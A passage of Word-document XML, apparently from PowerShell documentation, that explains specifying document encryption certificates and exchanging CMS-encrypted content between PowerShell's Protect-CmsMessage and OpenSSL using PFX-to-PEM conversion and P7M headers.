        </w:rPr>
        <w:t>An actual certificate (as retrieved from the certificate provider)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Path to the a file containing the certificate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Path to a directory containing the certificate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Thumbprint of the certificate (used to look in the certificate store)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Subject name of the certificate (used to look in the certificate store)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>To view document encryption certificates in the certificate provider, you can use the -</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:b/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>DocumentEncryptionCert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic parameter</w:t>
      </w:r>
      <w:r w:rsidR="00882822">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00882822" w:rsidRPr="00882822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Get-ChildItem</w:t>
      </w:r>
      <w:r w:rsidR="00882822">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00882822" w:rsidRPr="00582E46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidR="00882822">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="005D04CA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>58 [Cert:\currentuser\my]</w:t>
      </w:r>
      <w:r w:rsidR="005D04CA">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; dir -DocumentEncryptionCert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223DCC" w:rsidRDefault="00223DCC" w:rsidP="00223DCC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Interoperability of CMS Content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A740C" w:rsidRDefault="00861E74" w:rsidP="001B7BE1">
      <w:r>
        <w:t>Because the CMS format is an IETF standard, PowerShell supports the decryption of content generated by other conforming tools, and the content it generates can be decrypted by other conforming tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088753B" w:rsidRDefault="0088753B" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">One of the more popular implementations to support the CMS message format is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="0088753B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OpenSSL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> library and command-line toolchain.</w:t>
      </w:r>
      <w:r w:rsidR="00C0778B">
        <w:t xml:space="preserve"> The primary challenge when exchanging data with the OpenSSL library </w:t>
      </w:r>
      <w:r w:rsidR="00701AE5">
        <w:t>comes from the OpenSSL assumption that the content is contained within an email message body in the P7</w:t>
      </w:r>
      <w:r w:rsidR="009A25CA">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00701AE5">
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
      <w:r w:rsidR="00482836">
        <w:t xml:space="preserve"> Fortunately, these text-based headers are relatively easy to add and remove.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE09AC" w:rsidRDefault="00BE09AC" w:rsidP="001B7BE1">
      <w:r>
        <w:t>The following PowerShell commands demonstrate using OpenSSL and PowerShell to encrypt and decrypt content generated by the other application.</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Install the OpenSSL package</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Install-Package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OpenSSL.Light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OpenSSL requires certificates in the PEM format. To create this,</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export the Windows certificate in PFX format, and ensure that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B938E9" w:rsidRDefault="000B35A7"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xml:space="preserve">## the </w:t>
      </w:r>
      <w:r w:rsidR="00B938E9">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00710CA6">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00B938E9">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X is protected by a password (rather than account) as</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OpenSSL doesn't support group-protected PFX files</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9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"C:\Program Files\OpenSSL\bin\openssl.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pkcs12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C:\temp\cert.pfx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\temp\cert.pem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-nodes</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w:t>
      </w:r>
      <w:r w:rsidR="00DD1EC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypt with PowerShell, decrypt with OpenSSL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A09" w:rsidRDefault="008B1A0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First, protect some content in PowerShell.</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Get-Process</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Protect-CmsMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"*myRecipient*"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Set-Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encrypted.txt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&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2458"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PowerShell uses BEGIN </w:t>
      </w:r>
      <w:r w:rsidR="00FD2458">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ END CMS sigil</w:t>
      </w:r>
      <w:r w:rsidR="00FD2458">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s to signify encrypted content.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OpenSSL requires</w:t>
      </w:r>
      <w:r w:rsidR="00FD2458">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>an email-header:</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MIME-Version: 1.0</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Content-Disposition: attachment; filename="smime.p7m"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Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"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Content-Transfer-Encoding: base64</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So, tweak the data.</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#&gt;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B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$p7mHeader</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B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MIME-Version: 1.0</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B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content-Disposition: attachment; filename="smime.p7m"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B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"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B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content-Transfer-Encoding: base64</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8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w: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$unixContent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Get-Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encrypted.txt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Select-String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-notmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"----"</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$p7mHeader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"`r`n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$unixContent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Set-Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encrypted_unix.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-Encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ASCII</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Finally, decrypt with OpenSSL</w:t>
      </w:r>
      <w:r w:rsidR="00840B3F">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. Ensure that the content is encoded as ASCII.</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9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"C:\Program Files\OpenSSL\bin\openssl.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encrypted_unix.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-recip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.\cert.pem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006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r w:rsidR="00C22667">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypt with OpenSSL, decrypt with PowerShell</w:t>
      </w:r>
    </w:p>
